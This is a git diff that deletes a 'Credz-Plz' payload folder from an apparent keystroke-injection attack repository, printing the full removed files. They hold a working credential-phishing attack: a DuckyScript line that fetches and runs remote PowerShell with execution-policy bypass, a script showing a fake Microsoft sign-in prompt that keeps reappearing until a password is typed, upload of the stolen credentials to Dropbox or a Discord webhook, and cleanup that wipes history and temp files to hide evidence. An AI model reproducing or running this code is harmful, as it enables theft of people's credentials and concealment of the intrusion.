diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt
deleted file mode 100644
index fecba89..0000000
--- a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt
+++ /dev/null
@@ -1,19 +0,0 @@
-REM Title: Credz-Plz
-
-REM Author: I am Jakoby
-
-REM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.
-
-REM See README.md file for more details.
-
-REM Target: Windows 10, 11
-
-GUI r
-DELAY 500
-STRING powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex
-ENTER
-
-REM Fill in either variable or both to set your exfil method.
-REM $db is the variable that holds your DropBox token.
-REM $dc is the variable that holds your Discord webhook.
-REM If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly.
diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1
deleted file mode 100644
index f5c1ef3..0000000
--- a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1
+++ /dev/null
@@ -1,239 +0,0 @@ -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # -# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # -# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # -# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# tiktok.com/@i_am_jakoby # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - -<# -.SYNOPSIS - This script is meant to trick your target into sharing their credentials through a fake authentication pop up message - -.DESCRIPTION - A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" - This will be followed by a fake authentication ui prompt. 
- If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up - Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection - -.Link - https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads - -#> - -#------------------------------------------------------------------------------------------------------------------------------------ -# This is for if you want to host your own version of the script - -# $db = "YOUR-DROPBOX-ACCESS-TOKEN" - -# $dc = "YOUR-DISCORD-WEBHOOK" - -#------------------------------------------------------------------------------------------------------------------------------------ - -$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt" - -#------------------------------------------------------------------------------------------------------------------------------------ - -<# - -.NOTES - This is to generate the ui.prompt you will use to harvest their credentials -#> - -function Get-Creds { - - $form = $null - - while ($form -eq $null) - { - $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); - $cred.getnetworkcredential().password - - if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) - { - if(-not ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule -like "*PresentationCore*" -or $_.ManifestModule -like "*PresentationFramework*" })) - { - Add-Type -AssemblyName PresentationCore,PresentationFramework - } - - $msgBody = "Credentials cannot be empty!" 
- $msgTitle = "Error" - $msgButton = 'Ok' - $msgImage = 'Stop' - $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) - Write-Host "The user clicked: $Result" - $form = $null - } - - else{ - $creds = $cred.GetNetworkCredential() | fl - return $creds - } - } -} - -#---------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to pause the script until a mouse movement is detected -#> - -function Pause-Script{ -Add-Type -AssemblyName System.Windows.Forms -$originalPOS = [System.Windows.Forms.Cursor]::Position.X -$o=New-Object -ComObject WScript.Shell - - while (1) { - $pauseTime = 3 - if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ - break - } - else { - $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime - } - } -} - -#---------------------------------------------------------------------------------------------------- - -# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off - -function Caps-Off { -Add-Type -AssemblyName System.Windows.Forms -$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') - -#If true, toggle CapsLock key, to ensure that the script doesn't fail -if ($caps -eq $true){ - -$key = New-Object -ComObject WScript.Shell -$key.SendKeys('{CapsLock}') -} -} -#---------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to call the function to pause the script until a mouse movement is detected then activate the pop-up -#> - -Pause-Script - -Caps-Off - -Add-Type -AssemblyName PresentationCore,PresentationFramework -$msgBody = "Please authenticate your Microsoft Account." 
-$msgTitle = "Authentication Required" -$msgButton = 'Ok' -$msgImage = 'Warning' -$Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) -Write-Host "The user clicked: $Result" - -$creds = Get-Creds - -#------------------------------------------------------------------------------------------------------------------------------------ - -<# - -.NOTES - This is to save the gathered credentials to a file in the temp directory -#> - -echo $creds >> $env:TMP\$FileName - -#------------------------------------------------------------------------------------------------------------------------------------ - -<# - -.NOTES - This is to upload your files to dropbox -#> - -function DropBox-Upload { - -[CmdletBinding()] -param ( - -[Parameter (Mandatory = $True, ValueFromPipeline = $True)] -[Alias("f")] -[string]$SourceFilePath -) -$outputFile = Split-Path $SourceFilePath -leaf -$TargetFilePath="/$outputFile" -$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' -$authorization = "Bearer " + $db -$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" -$headers.Add("Authorization", $authorization) -$headers.Add("Dropbox-API-Arg", $arg) -$headers.Add("Content-Type", 'application/octet-stream') -Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers -} - -if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName} - -#------------------------------------------------------------------------------------------------------------------------------------ - -function Upload-Discord { - -[CmdletBinding()] -param ( - [parameter(Position=0,Mandatory=$False)] - [string]$file, - [parameter(Position=1,Mandatory=$False)] - [string]$text -) - -$hookurl = "$dc" - -$Body = @{ - 'username' = $env:username - 'content' = $text -} - -if (-not ([string]::IsNullOrEmpty($text))){ -Invoke-RestMethod -ContentType 
'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; - -if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} -} - -if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName} - -#------------------------------------------------------------------------------------------------------------------------------------ - -<# - -.NOTES - This is to clean up behind you and remove any evidence to prove you were there -#> - -# Delete contents of Temp folder - -rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue - -# Delete run box history - -reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f - -# Delete powershell history - -Remove-Item (Get-PSreadlineOption).HistorySavePath - -# Deletes contents of recycle bin - -Clear-RecycleBin -Force -ErrorAction SilentlyContinue - -exit - diff --git a/Payloads/Flip-Credz-Plz/README.md b/Payloads/Flip-Credz-Plz/README.md deleted file mode 100644 index 8bfc69b..0000000 --- a/Payloads/Flip-Credz-Plz/README.md +++ /dev/null @@ -1,121 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - -
- Table of Contents -
    -
  1. Description
  2. -
  3. Getting Started
  4. -
  5. Contributing
  6. -
  7. Version History
  8. -
  9. Contact
  10. -
  11. Acknowledgments
  12. -
-
- -# Credz-Plz - -A script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook. - -## Description - -A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account". -This will be followed by a fake authentication ui prompt. -If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up. -Once the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection. - -![alt text](https://i.imgur.com/mudQcIh.png) - -![alt text](https://i.imgur.com/3JqE7a8.png) - -## Getting Started - -### Dependencies - -* DropBox or other file sharing service - Your Shared link for the intended file -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -* You no longer need to host your own version of this script -* `$db` is the variable that holds your DropBox token -* `$dc` is the variable that holds your Discord webhook -* Fill in either variable or both to set your exfil method - -``` -powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - - - -
- - C# - -
YouTube -
- - Python - -
Twitter -
- - Golang - -
Instagram -
- - Jsonnet - -
Discord -
- - Jsonnet - -
TikTok -
-
- - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - -

(back to top)

diff --git a/Payloads/Flip-Credz-Plz/authentication.jpg b/Payloads/Flip-Credz-Plz/authentication.jpg
deleted file mode 100644
index 8e16d44..0000000
Binary files a/Payloads/Flip-Credz-Plz/authentication.jpg and /dev/null differ
diff --git a/Payloads/Flip-Credz-Plz/sign-in.jpg b/Payloads/Flip-Credz-Plz/sign-in.jpg
deleted file mode 100644
index b719a8a..0000000
Binary files a/Payloads/Flip-Credz-Plz/sign-in.jpg and /dev/null differ